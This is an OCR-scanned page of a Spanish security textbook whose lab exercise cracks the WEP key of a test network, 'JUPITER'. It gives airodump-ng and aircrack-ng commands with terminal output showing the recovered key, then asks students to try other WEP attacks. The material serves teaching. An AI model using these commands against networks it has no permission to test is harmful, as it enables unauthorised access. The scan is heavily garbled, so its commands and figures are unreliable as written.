Seguridad activa en redes
------------------------~
6
Caso práctico 8 " (Continuación)
Puedes encontrar muy buenos
•
También le indicaremos el canal en el que tiene que escuchar. En nuestro caso y según la Figura 6.48 es el canal 8 (está indicado en la columna CH).
•
Además indicaremos que guarde solo los vectores de inicialización, que son los que nos permitirán descifrar la contraseña . Eso lo haremos con el parámetro --ivs.
•
y el interfaz por el que queremos que escuche los paquetes: monO
El comando a ejecutar será: airodump-ng
- -channel
8
--ivs
vídeo-tutoriales sobre esfe proceso en lo página de Wi-FiSlax Ihttp://www.wi-Fislax.com/ manuales/videos.phpl
--bssid
00:03:C9:E6:9A:2B --w jupiter monO. arc.hivo ¡¡ditar eH
8
1(
~er
Ierminal
Elapsed: 19 mins
~olap Els
1(
Atyda
2009-99-28 09:04
aSSIO
PWR. 1\)(0
aeacons
OO:Ol:C9:E6:9A:28
219 100
6269
8SSIO
STATION
PWR.
Rate
lost
Packets
00:03:C9:E6:9A:2a
00:OE:ls:68:95:99
209
54-54
o
81397
l/Data, #/s 83744
eH
Ha
ENC
eIPHER AUTH ESSIO
a
54
WEP
WEP
155
OPlI
JUPITER
Probes
Fig. 6.49. Resultado oirodump-ng poro JUPITER. Para acelerar este proceso puedes conectar otros equipos a la red JUPITER y descargarte en cada uno algún fichero grande de Internet. En la Figura 6.49 puedes ver el resultado después de 10 minutos ejecutando airodump-ng. Ha capturado 83744 paquetes válidos para descubrir la clave (155 paquetes válidos por segundo). También puedes ver en esta figura que la autenticación (columna AUTH) es abierta (OPN, open) . . 5. Cuando hayamos capturado unos 10000 paquetes de tipo IVS, intentamos sacar la clave con el comando aircrack-ng al que le pasaremos: • BSSID: dirección MAC del punto de acceso. •
El tamaño de la contraseña WEP, en nuestro caso 64.
•
Y el fichero en el que están almacenados los datos. Los ficheros almacenados son jupiter-Ol.ivs, jupiter02.ivs ...
El comando a ejecutar será: a ircrack- ng -b 00:03:C9:E6:9A:2B -n 64 jupiter*.ivs archivo ¡;,ditar
~er
Terminal
~olapas
Atyda Airerack-ng 1.0 rel
(OO:OO:OOJ Tested 595773 keys (got 8729 IVs) KB 9 1 2 3 4
depth 9/ 33 2/ 7 01 6 10/ 13 1/ 15
byte(vote) 4A(11529) 76(11520) 55 (13856) 9A( 11056) 59(14336) es(12800) 98 (11264) 24 (11808) 54(12544) 6C(12288)
C8(11520) 08(12288) AO(12544) 18 (11088) Fl(12032)
01(11520) 69(12288) 05(11776) 70 (11008) 05(11776)
KEY FOUNOI ( 4A:55 :50:49:54 Oecrypted correctly: 100%
1
EF(11520) 90 (12032) OE(11776) AA (11008) 51(11776)
Actividades " 21. Aprovechando los vídeotutoriales de la página de Wi-Fislax, investiga que otro tipo de ataques se pueden realizar sobre WEP. 22. Elige un tipo de ataque de los anteriores y haz tu mismo un tutorial de cómo utilizando el ataque que has elegido se puede averiguar la contraseña.
F2(11520) SC (11776) 1E(11776) F7 (11008) 58(11776)
(ASCII : JUPIT I
Fig. 6.50. Resultado oircrack-ng para JUPITER. Como se puede observar en la Figura 6.50 después de 10 minutos capturando paquetes hemos sido capaces de encontrar la contraseña (JUPIT). En el caso de haber utilizado una contraseña de 128 bits, hubiéramos necesitado un poco mós de tiempo, pero el proceso es el mismo.
.
"4 q. '/./
23. Repite el proceso utilizando seguridad WEP 128 y mientras tanto prueba el ataque que seleccionaste en la actividad 22 .
l
169